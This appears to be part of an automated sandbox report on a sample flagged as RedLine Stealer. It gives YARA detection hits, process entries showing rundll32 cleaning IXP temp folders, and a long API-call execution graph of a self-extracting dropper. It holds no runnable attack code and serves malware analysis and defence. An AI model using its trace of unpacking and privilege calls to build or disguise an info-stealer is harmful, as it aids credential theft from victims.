                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.402237426.0000000000848000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 44%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                      Start time:11:38:53
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff7e46f0000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                      Start time:11:39:02
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff7e46f0000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                      Start time:11:39:10
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff7e46f0000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                      Start time:11:39:19
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff7e46f0000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.6%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:29.6%
                                                                                                                                                                                                        Total number of Nodes:964
                                                                                                                                                                                                        Total number of Limit Nodes:25
                                                                                                                                                                                                        execution_graph 3123 e86bef _XcptFilter 2200 e86a60 2217 e87155 2200->2217 2202 e86a65 2203 e86a76 GetStartupInfoW 2202->2203 2204 e86a93 2203->2204 2205 e86aa8 2204->2205 2206 e86aaf Sleep 2204->2206 2207 e86ac7 _amsg_exit 2205->2207 2210 e86ad1 2205->2210 2206->2204 2207->2210 2208 e86b2e __IsNonwritableInCurrentImage 2212 e86bd6 _ismbblead 2208->2212 2214 e86c1e 2208->2214 2215 e86bbe exit 2208->2215 2222 e82bfb GetVersion 2208->2222 2209 e86b13 _initterm 2209->2208 2210->2208 2210->2209 2211 e86af4 2210->2211 2212->2208 2214->2211 2216 e86c27 _cexit 2214->2216 2215->2208 2216->2211 2218 e8717a 2217->2218 2219 e8717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2217->2219 2218->2219 2220 e871e2 2218->2220 2221 e871cd 2219->2221 2220->2202 2221->2220 2223 e82c0f 2222->2223 2224 e82c50 2222->2224 2223->2224 2226 e82c13 GetModuleHandleW 2223->2226 2239 e82caa memset memset memset 2224->2239 2226->2224 2228 e82c22 GetProcAddress 2226->2228 2228->2224 2233 e82c34 2228->2233 2229 e82c8e 2230 e82c9e 2229->2230 2231 e82c97 CloseHandle 2229->2231 2230->2208 2231->2230 2233->2224 2237 e82c89 2333 e81f90 2237->2333 2350 e8468f FindResourceA SizeofResource 2239->2350 2242 e82ef3 2245 e844b9 20 API calls 2242->2245 2243 e82d2d CreateEventA SetEvent 2244 e8468f 7 API calls 2243->2244 2246 e82d57 2244->2246 2247 e82d6e 2245->2247 2248 e82d5b 2246->2248 2250 e82e1f 2246->2250 2253 e8468f 7 API calls 2246->2253 2355 e86ce0 2247->2355 2360 e844b9 2248->2360 2389 e85c9e 2250->2389 2256 e82d9f 2253->2256 2254 e82c62 2254->2229 2280 e82f1d 2254->2280 2256->2248 2257 e82da3 CreateMutexA 2256->2257 2257->2250 2260 e82dbd GetLastError 2257->2260 2258 e82e3a 2261 e82e52 FindResourceA 2258->2261 2262 e82e43 2258->2262 2259 e82e30 2259->2242 2260->2250 2264 e82dca 2260->2264 2265 e82e6e 2261->2265 2266 e82e64 LoadResource 2261->2266 2415 e82390 2262->2415 2267 e82dea 2264->2267 2268 e82dd5 2264->2268 2271 e82e4d 2265->2271 2430 e836ee GetVersionExA 2265->2430 2266->2265 2270 e844b9 20 API calls 2267->2270 2269 e844b9 20 API calls 2268->2269 2272 e82de8 2269->2272 2273 e82dff 2270->2273 2271->2247 2275 e82e04 CloseHandle 2272->2275 2273->2250 2273->2275 2275->2247 2281 e82f6c 2280->2281 2282 e82f3f 2280->2282 2574 e85164 2281->2574 2284 e82f5f 2282->2284 2555 e851e5 2282->2555 2702 e83a3f 2284->2702 2286 e82f71 2316 e8303c 2286->2316 2587 e855a0 2286->2587 2292 e86ce0 4 API calls 2294 e82c6b 2292->2294 2293 e82f86 GetSystemDirectoryA 2295 e8658a CharPrevA 2293->2295 2320 e852b6 2294->2320 2296 e82fab LoadLibraryA 2295->2296 2297 e82fc0 GetProcAddress 2296->2297 2298 e82ff7 FreeLibrary 2296->2298 2297->2298 2301 e82fd6 DecryptFileA 2297->2301 2299 e83006 2298->2299 2300 e83017 SetCurrentDirectoryA 2298->2300 2299->2300 2635 e8621e GetWindowsDirectoryA 2299->2635 2302 e83054 2300->2302 2303 e83026 2300->2303 2301->2298 2311 e82ff0 2301->2311 2304 e83061 2302->2304 2645 e83b26 2302->2645 2306 e844b9 20 API calls 2303->2306 2315 e8307a 2304->2315 2304->2316 2654 e8256d 2304->2654 2310 e83037 2306->2310 2721 e86285 GetLastError 2310->2721 2311->2298 2313 e83098 2313->2316 2318 e830af 2313->2318 2315->2313 2665 e83ba2 2315->2665 2316->2292 2723 e84169 2318->2723 2321 e852d6 2320->2321 2326 e85316 2320->2326 2322 e85300 LocalFree LocalFree 2321->2322 2324 e852eb SetFileAttributesA DeleteFileA 2321->2324 2322->2321 2322->2326 2323 e8538c 2327 e86ce0 4 API calls 2323->2327 2324->2322 2325 e85374 2325->2323 3053 e81fe1 2325->3053 2326->2325 2330 e8535e SetCurrentDirectoryA 2326->2330 2331 e865e8 4 API calls 2326->2331 2329 e82c72 2327->2329 2329->2229 2329->2237 2332 e82390 13 API calls 2330->2332 2331->2330 2332->2325 2334 e81f9a 2333->2334 2335 e81f9f 2333->2335 2336 e81ea7 15 API calls 2334->2336 2337 e844b9 20 API calls 2335->2337 2341 e81fd9 2335->2341 2342 e81fc0 2335->2342 2336->2335 2337->2342 2338 e81ee2 GetCurrentProcess OpenProcessToken 2343 e81f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2338->2343 2345 e81f0e 2338->2345 2339 e81fcf ExitWindowsEx 2339->2341 2341->2229 2342->2338 2342->2339 2342->2341 2344 e81f6b ExitWindowsEx 2343->2344 2343->2345 2344->2345 2346 e81f1f 2344->2346 2347 e844b9 20 API calls 2345->2347 2348 e86ce0 4 API calls 2346->2348 2347->2346 2349 e81f8c 2348->2349 2349->2229 2351 e82d1a 2350->2351 2352 e846b6 2350->2352 2351->2242 2351->2243 2352->2351 2353 e846be FindResourceA LoadResource LockResource 2352->2353 2353->2351 2354 e846df memcpy_s FreeResource 2353->2354 2354->2351 2356 e86ce8 2355->2356 2357 e86ceb 2355->2357 2356->2254 2472 e86cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2357->2472 2359 e86e26 2359->2254 2361 e8455a 2360->2361 2362 e844fe LoadStringA 2360->2362 2365 e86ce0 4 API calls 2361->2365 2363 e84562 2362->2363 2364 e84527 2362->2364 2369 e845c9 2363->2369 2375 e8457e 2363->2375 2366 e8681f 10 API calls 2364->2366 2367 e84689 2365->2367 2368 e8452c 2366->2368 2367->2247 2370 e84536 MessageBoxA 2368->2370 2485 e867c9 2368->2485 2372 e845cd LocalAlloc 2369->2372 2373 e84607 LocalAlloc 2369->2373 2370->2361 2372->2361 2377 e845f3 2372->2377 2373->2361 2383 e845c4 2373->2383 2375->2375 2379 e84596 LocalAlloc 2375->2379 2380 e8171e _vsnprintf 2377->2380 2378 e8462d MessageBeep 2473 e8681f 2378->2473 2379->2361 2382 e845af 2379->2382 2380->2383 2491 e8171e 2382->2491 2383->2378 2386 e84645 MessageBoxA LocalFree 2386->2361 2387 e867c9 EnumResourceLanguagesA 2387->2386 2395 e85e17 2389->2395 2400 e85cc3 2389->2400 2390 e86ce0 4 API calls 2392 e82e2c 2390->2392 2391 e85ced CharNextA 2391->2400 2392->2258 2392->2259 2393 e85dec GetModuleFileNameA 2394 e85e0a 2393->2394 2393->2395 2501 e866c8 2394->2501 2395->2390 2397 e86218 2510 e86e2a 2397->2510 2400->2391 2400->2395 2400->2397 2401 e85e36 CharUpperA 2400->2401 2407 e85dd0 2400->2407 2408 e85f9f CharUpperA 2400->2408 2409 e85f59 CompareStringA 2400->2409 2410 e86003 CharUpperA 2400->2410 2411 e8667f IsDBCSLeadByte CharNextA 2400->2411 2412 e85edc CharUpperA 2400->2412 2413 e860a2 CharUpperA 2400->2413 2506 e8658a 2400->2506 2401->2400 2402 e861d0 2401->2402 2403 e844b9 20 API calls 2402->2403 2404 e861e7 2403->2404 2405 e861f0 CloseHandle 2404->2405 2406 e861f7 ExitProcess 2404->2406 2405->2406 2407->2393 2407->2395 2408->2400 2409->2400 2410->2400 2411->2400 2412->2400 2413->2400 2416 e823b9 2415->2416 2417 e824cb 2415->2417 2416->2417 2420 e823e9 FindFirstFileA 2416->2420 2418 e86ce0 4 API calls 2417->2418 2419 e824dc 2418->2419 2419->2271 2420->2417 2428 e82407 2420->2428 2421 e82479 2425 e82488 SetFileAttributesA DeleteFileA 2421->2425 2422 e82421 lstrcmpA 2423 e824a9 FindNextFileA 2422->2423 2424 e82431 lstrcmpA 2422->2424 2426 e824bd FindClose RemoveDirectoryA 2423->2426 2423->2428 2424->2423 2424->2428 2425->2423 2426->2417 2427 e8658a CharPrevA 2427->2428 2428->2421 2428->2422 2428->2423 2428->2427 2429 e82390 5 API calls 2428->2429 2429->2428 2435 e83737 2430->2435 2437 e8372d 2430->2437 2431 e844b9 20 API calls 2432 e839fc 2431->2432 2433 e86ce0 4 API calls 2432->2433 2434 e82e92 2433->2434 2434->2247 2434->2271 2445 e818a3 2434->2445 2435->2432 2435->2437 2438 e838a4 2435->2438 2517 e828e8 2435->2517 2437->2431 2437->2432 2438->2432 2438->2437 2439 e839c1 MessageBeep 2438->2439 2440 e8681f 10 API calls 2439->2440 2441 e839ce 2440->2441 2442 e839d8 MessageBoxA 2441->2442 2443 e867c9 EnumResourceLanguagesA 2441->2443 2442->2432 2443->2442 2446 e819b8 2445->2446 2447 e818d5 2445->2447 2449 e86ce0 4 API calls 2446->2449 2546 e817ee LoadLibraryA 2447->2546 2451 e819d5 2449->2451 2451->2271 2465 e86517 FindResourceA 2451->2465 2452 e818e5 GetCurrentProcess OpenProcessToken 2452->2446 2453 e81900 GetTokenInformation 2452->2453 2454 e81918 GetLastError 2453->2454 2455 e819aa CloseHandle 2453->2455 2454->2455 2456 e81927 LocalAlloc 2454->2456 2455->2446 2457 e81938 GetTokenInformation 2456->2457 2458 e819a9 2456->2458 2459 e8194e AllocateAndInitializeSid 2457->2459 2460 e819a2 LocalFree 2457->2460 2458->2455 2459->2460 2464 e8196e 2459->2464 2460->2458 2461 e81999 FreeSid 2461->2460 2462 e81975 EqualSid 2463 e8198c 2462->2463 2462->2464 2463->2461 2464->2461 2464->2462 2464->2463 2466 e8656b 2465->2466 2467 e86536 LoadResource 2465->2467 2469 e844b9 20 API calls 2466->2469 2467->2466 2468 e86544 DialogBoxIndirectParamA FreeResource 2467->2468 2468->2466 2470 e8657c 2468->2470 2469->2470 2470->2271 2472->2359 2474 e86940 2473->2474 2475 e86857 GetVersionExA 2473->2475 2476 e86ce0 4 API calls 2474->2476 2477 e8687c 2475->2477 2484 e8691a 2475->2484 2478 e8463b 2476->2478 2479 e868a5 GetSystemMetrics 2477->2479 2477->2484 2478->2386 2478->2387 2480 e868b5 RegOpenKeyExA 2479->2480 2479->2484 2481 e868d6 RegQueryValueExA RegCloseKey 2480->2481 2480->2484 2482 e8690c 2481->2482 2481->2484 2495 e866f9 2482->2495 2484->2474 2486 e867e2 2485->2486 2490 e86803 2485->2490 2499 e86793 EnumResourceLanguagesA 2486->2499 2488 e867f5 2488->2490 2500 e86793 EnumResourceLanguagesA 2488->2500 2490->2370 2492 e8172d 2491->2492 2493 e8173d _vsnprintf 2492->2493 2494 e8175d 2492->2494 2493->2494 2494->2383 2496 e8670f 2495->2496 2497 e86740 CharNextA 2496->2497 2498 e8674b 2496->2498 2497->2496 2498->2484 2499->2488 2500->2490 2502 e866d5 2501->2502 2503 e866f3 2502->2503 2505 e866e5 CharNextA 2502->2505 2513 e86648 2502->2513 2503->2395 2505->2502 2507 e8659b 2506->2507 2507->2507 2508 e865b8 CharPrevA 2507->2508 2509 e865ab 2507->2509 2508->2509 2509->2400 2516 e86cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2510->2516 2512 e8621d 2514 e8665d IsDBCSLeadByte 2513->2514 2515 e86668 2513->2515 2514->2515 2515->2502 2516->2512 2518 e82a62 2517->2518 2525 e8290d 2517->2525 2519 e82a6e GlobalFree 2518->2519 2520 e82a75 2518->2520 2519->2520 2520->2438 2522 e82955 GlobalAlloc 2522->2518 2523 e82968 GlobalLock 2522->2523 2523->2518 2523->2525 2524 e82a20 GlobalUnlock 2524->2525 2525->2518 2525->2522 2525->2524 2526 e82a80 GlobalUnlock 2525->2526 2527 e82773 2525->2527 2526->2518 2528 e828b2 2527->2528 2529 e827a3 CharUpperA CharNextA CharNextA 2527->2529 2531 e828b7 GetSystemDirectoryA 2528->2531 2530 e827db 2529->2530 2529->2531 2532 e828a8 GetWindowsDirectoryA 2530->2532 2533 e827e3 2530->2533 2534 e828bf 2531->2534 2532->2534 2538 e8658a CharPrevA 2533->2538 2535 e828d2 2534->2535 2536 e8658a CharPrevA 2534->2536 2537 e86ce0 4 API calls 2535->2537 2536->2535 2539 e828e2 2537->2539 2540 e82810 RegOpenKeyExA 2538->2540 2539->2525 2540->2534 2541 e82837 RegQueryValueExA 2540->2541 2542 e8289a RegCloseKey 2541->2542 2543 e8285c 2541->2543 2542->2534 2544 e82867 ExpandEnvironmentStringsA 2543->2544 2545 e8287a 2543->2545 2544->2545 2545->2542 2547 e81890 2546->2547 2548 e81826 GetProcAddress 2546->2548 2549 e86ce0 4 API calls 2547->2549 2550 e81889 FreeLibrary 2548->2550 2551 e81839 AllocateAndInitializeSid 2548->2551 2552 e8189f 2549->2552 2550->2547 2551->2550 2553 e8185f FreeSid 2551->2553 2552->2446 2552->2452 2553->2550 2556 e8468f 7 API calls 2555->2556 2557 e851f9 LocalAlloc 2556->2557 2558 e8522d 2557->2558 2559 e8520d 2557->2559 2560 e8468f 7 API calls 2558->2560 2561 e844b9 20 API calls 2559->2561 2562 e8523a 2560->2562 2563 e8521e 2561->2563 2564 e8523e 2562->2564 2565 e85262 lstrcmpA 2562->2565 2566 e86285 GetLastError 2563->2566 2567 e844b9 20 API calls 2564->2567 2568 e8527e 2565->2568 2569 e85272 LocalFree 2565->2569 2573 e82f4d 2566->2573 2570 e8524f LocalFree 2567->2570 2571 e844b9 20 API calls 2568->2571 2569->2573 2570->2573 2572 e85290 LocalFree 2571->2572 2572->2573 2573->2281 2573->2284 2573->2316 2575 e8468f 7 API calls 2574->2575 2576 e85175 2575->2576 2577 e8517a 2576->2577 2578 e851af 2576->2578 2579 e844b9 20 API calls 2577->2579 2580 e8468f 7 API calls 2578->2580 2586 e8518d 2579->2586 2581 e851c0 2580->2581 2736 e86298 2581->2736 2584 e851e1 2584->2286 2585 e844b9 20 API calls 2585->2586 2586->2286 2588 e8468f 7 API calls 2587->2588 2589 e855c7 LocalAlloc 2588->2589 2590 e855db 2589->2590 2591 e855fd 2589->2591 2593 e844b9 20 API calls 2590->2593 2592 e8468f 7 API calls 2591->2592 2594 e8560a 2592->2594 2595 e855ec 2593->2595 2596 e8560e 2594->2596 2597 e85632 lstrcmpA 2594->2597 2598 e86285 GetLastError 2595->2598 2599 e844b9 20 API calls 2596->2599 2600 e8564b LocalFree 2597->2600 2601 e85645 2597->2601 2612 e855f1 2598->2612 2602 e8561f LocalFree 2599->2602 2603 e8565b 2600->2603 2604 e85696 2600->2604 2601->2600 2602->2612 2611 e85467 49 API calls 2603->2611 2605 e8589f 2604->2605 2607 e856ae GetTempPathA 2604->2607 2608 e86517 24 API calls 2605->2608 2606 e86ce0 4 API calls 2609 e82f7e 2606->2609 2610 e856c3 2607->2610 2616 e856eb 2607->2616 2608->2612 2609->2293 2609->2316 2748 e85467 2610->2748 2614 e85678 2611->2614 2612->2606 2614->2612 2619 e844b9 20 API calls 2614->2619 2616->2612 2617 e8586c GetWindowsDirectoryA 2616->2617 2618 e85717 GetDriveTypeA 2616->2618 2782 e8597d GetCurrentDirectoryA SetCurrentDirectoryA 2617->2782 2620 e85730 GetFileAttributesA 2618->2620 2634 e8572b 2618->2634 2619->2612 2620->2634 2624 e8597d 34 API calls 2624->2634 2625 e85467 49 API calls 2625->2616 2626 e82630 21 API calls 2626->2634 2628 e857c1 GetWindowsDirectoryA 2628->2634 2629 e8658a CharPrevA 2630 e857e8 GetFileAttributesA 2629->2630 2631 e857fa CreateDirectoryA 2630->2631 2630->2634 2631->2634 2632 e85827 SetFileAttributesA 2632->2634 2633 e85467 49 API calls 2633->2634 2634->2612 2634->2617 2634->2618 2634->2620 2634->2624 2634->2626 2634->2628 2634->2629 2634->2632 2634->2633 2778 e86952 2634->2778 2636 e86268 2635->2636 2637 e86249 2635->2637 2639 e8597d 34 API calls 2636->2639 2638 e844b9 20 API calls 2637->2638 2640 e8625a 2638->2640 2641 e8625f 2639->2641 2642 e86285 GetLastError 2640->2642 2643 e86ce0 4 API calls 2641->2643 2642->2641 2644 e83013 2643->2644 2644->2300 2644->2316 2646 e83b2d 2645->2646 2646->2646 2647 e83b72 2646->2647 2648 e83b53 2646->2648 2848 e84fe0 2647->2848 2650 e86517 24 API calls 2648->2650 2651 e83b70 2650->2651 2652 e86298 10 API calls 2651->2652 2653 e83b7b 2651->2653 2652->2653 2653->2304 2655 e82622 2654->2655 2656 e82583 2654->2656 2899 e824e0 GetWindowsDirectoryA 2655->2899 2658 e825e8 RegOpenKeyExA 2656->2658 2661 e8258b 2656->2661 2659 e82609 RegQueryInfoKeyA 2658->2659 2660 e825e3 2658->2660 2663 e825d1 RegCloseKey 2659->2663 2660->2315 2661->2660 2662 e8259b RegOpenKeyExA 2661->2662 2662->2660 2664 e825bc RegQueryValueExA 2662->2664 2663->2660 2664->2663 2666 e83bdb 2665->2666 2681 e83bec 2665->2681 2667 e8468f 7 API calls 2666->2667 2667->2681 2668 e83c03 memset 2668->2681 2669 e83d13 2671 e844b9 20 API calls 2669->2671 2670 e8468f 7 API calls 2670->2681 2677 e83d26 2671->2677 2673 e86ce0 4 API calls 2676 e83f60 2673->2676 2674 e83fd7 2674->2677 2998 e82267 2674->2998 2675 e83d7b CompareStringA 2675->2674 2675->2681 2676->2313 2677->2673 2679 e83fab 2682 e844b9 20 API calls 2679->2682 2681->2668 2681->2669 2681->2670 2681->2674 2681->2675 2681->2677 2681->2679 2683 e83f1e LocalFree 2681->2683 2684 e83f46 LocalFree 2681->2684 2688 e83cc7 CompareStringA 2681->2688 2699 e83e10 2681->2699 2907 e81ae8 2681->2907 2948 e8202a memset memset RegCreateKeyExA 2681->2948 2974 e83fef 2681->2974 2686 e83fbe LocalFree 2682->2686 2683->2674 2683->2681 2684->2677 2686->2677 2688->2681 2689 e83e1f GetProcAddress 2691 e83f64 2689->2691 2689->2699 2690 e83f92 2692 e844b9 20 API calls 2690->2692 2693 e844b9 20 API calls 2691->2693 2694 e83fa9 2692->2694 2695 e83f75 FreeLibrary 2693->2695 2696 e83f7c LocalFree 2694->2696 2695->2696 2697 e86285 GetLastError 2696->2697 2698 e83f8b 2697->2698 2698->2677 2699->2689 2699->2690 2700 e83eff FreeLibrary 2699->2700 2701 e83f40 FreeLibrary 2699->2701 2988 e86495 2699->2988 2700->2683 2701->2684 2703 e8468f 7 API calls 2702->2703 2704 e83a55 LocalAlloc 2703->2704 2705 e83a6c 2704->2705 2706 e83a8e 2704->2706 2707 e844b9 20 API calls 2705->2707 2708 e8468f 7 API calls 2706->2708 2709 e83a7d 2707->2709 2710 e83a98 2708->2710 2711 e86285 GetLastError 2709->2711 2712 e83a9c 2710->2712 2713 e83ac5 lstrcmpA 2710->2713 2720 e82f64 2711->2720 2714 e844b9 20 API calls 2712->2714 2715 e83ada 2713->2715 2716 e83b0d LocalFree 2713->2716 2717 e83aad LocalFree 2714->2717 2718 e86517 24 API calls 2715->2718 2716->2720 2717->2720 2719 e83aec LocalFree 2718->2719 2719->2720 2720->2281 2720->2316 2722 e8628f 2721->2722 2722->2316 2724 e8468f 7 API calls 2723->2724 2725 e8417d LocalAlloc 2724->2725 2726 e841a8 2725->2726 2727 e84195 2725->2727 2729 e8468f 7 API calls 2726->2729 2728 e844b9 20 API calls 2727->2728 2730 e841a6 2728->2730 2731 e841b5 2729->2731 2730->2316 2732 e841b9 2731->2732 2733 e841c5 lstrcmpA 2731->2733 2735 e844b9 20 API calls 2732->2735 2733->2732 2734 e841e6 LocalFree 2733->2734 2734->2730 2735->2734 2737 e8171e _vsnprintf 2736->2737 2738 e862c9 FindResourceA 2737->2738 2740 e862cb LoadResource LockResource 2738->2740 2741 e86353 2738->2741 2740->2741 2744 e862e0 2740->2744 2742 e86ce0 4 API calls 2741->2742 2743 e851ca 2742->2743 2743->2584 2743->2585 2745 e8631b FreeResource 2744->2745 2746 e86355 FreeResource 2744->2746 2747 e8171e _vsnprintf 2745->2747 2746->2741 2747->2738 2749 e8548a 2748->2749 2750 e8551a 2748->2750 2808 e853a1 2749->2808 2819 e858c8 2750->2819 2752 e85581 2756 e86ce0 4 API calls 2752->2756 2755 e85495 2755->2752 2759 e8550c 2755->2759 2760 e854c2 GetSystemInfo 2755->2760 2761 e8559a 2756->2761 2757 e8553b CreateDirectoryA 2762 e85577 2757->2762 2763 e85547 2757->2763 2758 e8554d 2758->2752 2764 e8597d 34 API calls 2758->2764 2765 e8658a CharPrevA 2759->2765 2767 e854da 2760->2767 2761->2612 2772 e82630 GetWindowsDirectoryA 2761->2772 2766 e86285 GetLastError 2762->2766 2763->2758 2769 e8555c 2764->2769 2765->2750 2768 e8557c 2766->2768 2767->2759 2770 e8658a CharPrevA 2767->2770 2768->2752 2769->2752 2771 e85568 RemoveDirectoryA 2769->2771 2770->2759 2771->2752 2773 e8265e 2772->2773 2774 e8266f 2772->2774 2775 e844b9 20 API calls 2773->2775 2776 e86ce0 4 API calls 2774->2776 2775->2774 2777 e82687 2776->2777 2777->2616 2777->2625 2779 e8696e GetDiskFreeSpaceA 2778->2779 2780 e869a1 2778->2780 2779->2780 2781 e86989 MulDiv 2779->2781 2780->2634 2781->2780 2783 e859bb 2782->2783 2784 e859dd GetDiskFreeSpaceA 2782->2784 2787 e844b9 20 API calls 2783->2787 2785 e85ba1 memset 2784->2785 2786 e85a21 MulDiv 2784->2786 2788 e86285 GetLastError 2785->2788 2786->2785 2789 e85a50 GetVolumeInformationA 2786->2789 2790 e859cc 2787->2790 2791 e85bbc GetLastError FormatMessageA 2788->2791 2792 e85a6e memset 2789->2792 2793 e85ab5 SetCurrentDirectoryA 2789->2793 2794 e86285 GetLastError 2790->2794 2795 e85be3 2791->2795 2796 e86285 GetLastError 2792->2796 2797 e85acc 2793->2797 2798 e859d1 2794->2798 2799 e844b9 20 API calls 2795->2799 2800 e85a89 GetLastError FormatMessageA 2796->2800 2804 e85b0a 2797->2804 2806 e85b20 2797->2806 2802 e86ce0 4 API calls 2798->2802 2801 e85bf5 SetCurrentDirectoryA 2799->2801 2800->2795 2801->2798 2803 e85c11 2802->2803 2803->2616 2805 e844b9 20 API calls 2804->2805 2805->2798 2806->2798 2831 e8268b 2806->2831 2810 e853bf 2808->2810 2809 e8171e _vsnprintf 2809->2810 2810->2809 2811 e8658a CharPrevA 2810->2811 2815 e85415 GetTempFileNameA 2810->2815 2812 e853fa RemoveDirectoryA GetFileAttributesA 2811->2812 2812->2810 2813 e8544f CreateDirectoryA 2812->2813 2814 e8543a 2813->2814 2813->2815 2817 e86ce0 4 API calls 2814->2817 2815->2814 2816 e85429 DeleteFileA CreateDirectoryA 2815->2816 2816->2814 2818 e85449 2817->2818 2818->2755 2820 e858d8 2819->2820 2820->2820 2821 e858df LocalAlloc 2820->2821 2822 e858f3 2821->2822 2824 e85919 2821->2824 2823 e844b9 20 API calls 2822->2823 2830 e85906 2823->2830 2825 e8658a CharPrevA 2824->2825 2827 e85931 CreateFileA LocalFree 2825->2827 2826 e86285 GetLastError 2828 e85534 2826->2828 2829 e8595b CloseHandle GetFileAttributesA 2827->2829 2827->2830 2828->2757 2828->2758 2829->2830 2830->2826 2830->2828 2832 e826b9 2831->2832 2833 e826e5 2831->2833 2834 e8171e _vsnprintf 2832->2834 2835 e826ea 2833->2835 2836 e8271f 2833->2836 2837 e826cc 2834->2837 2838 e8171e _vsnprintf 2835->2838 2839 e826e3 2836->2839 2843 e8171e _vsnprintf 2836->2843 2840 e844b9 20 API calls 2837->2840 2842 e826fd 2838->2842 2841 e86ce0 4 API calls 2839->2841 2840->2839 2844 e8276d 2841->2844 2845 e844b9 20 API calls 2842->2845 2846 e82735 2843->2846 2844->2798 2845->2839 2847 e844b9 20 API calls 2846->2847 2847->2839 2849 e8468f 7 API calls 2848->2849 2850 e84ff5 FindResourceA LoadResource LockResource 2849->2850 2851 e85020 2850->2851 2852 e8515f 2850->2852 2853 e85029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2851->2853 2854 e85057 2851->2854 2852->2651 2853->2854 2867 e84efd 2854->2867 2857 e85060 2858 e844b9 20 API calls 2857->2858 2863 e85075 2858->2863 2859 e844b9 20 API calls 2859->2863 2860 e8511d 2864 e8513a 2860->2864 2866 e844b9 20 API calls 2860->2866 2861 e85110 FreeResource 2861->2860 2862 e8507c 2862->2859 2862->2863 2863->2860 2863->2861 2864->2852 2865 e8514c SendMessageA 2864->2865 2865->2852 2866->2864 2868 e84f4a 2867->2868 2869 e84fa1 2868->2869 2875 e84980 2868->2875 2871 e86ce0 4 API calls 2869->2871 2872 e84fc6 2871->2872 2872->2857 2872->2862 2876 e84990 2875->2876 2877 e849c2 lstrcmpA 2876->2877 2878 e849a5 2876->2878 2880 e84a0e 2877->2880 2881 e849ba 2877->2881 2879 e844b9 20 API calls 2878->2879 2879->2881 2880->2881 2886 e8487a 2880->2886 2881->2869 2883 e84b60 2881->2883 2884 e84b92 FindCloseChangeNotification 2883->2884 2885 e84b76 2883->2885 2884->2885 2885->2869 2887 e848a2 CreateFileA 2886->2887 2889 e84908 2887->2889 2890 e848e9 2887->2890 2889->2881 2890->2889 2891 e848ee 2890->2891 2894 e8490c 2891->2894 2895 e848f5 CreateFileA 2894->2895 2897 e84917 2894->2897 2895->2889 2896 e84962 CharNextA 2896->2897 2897->2895 2897->2896 2898 e84953 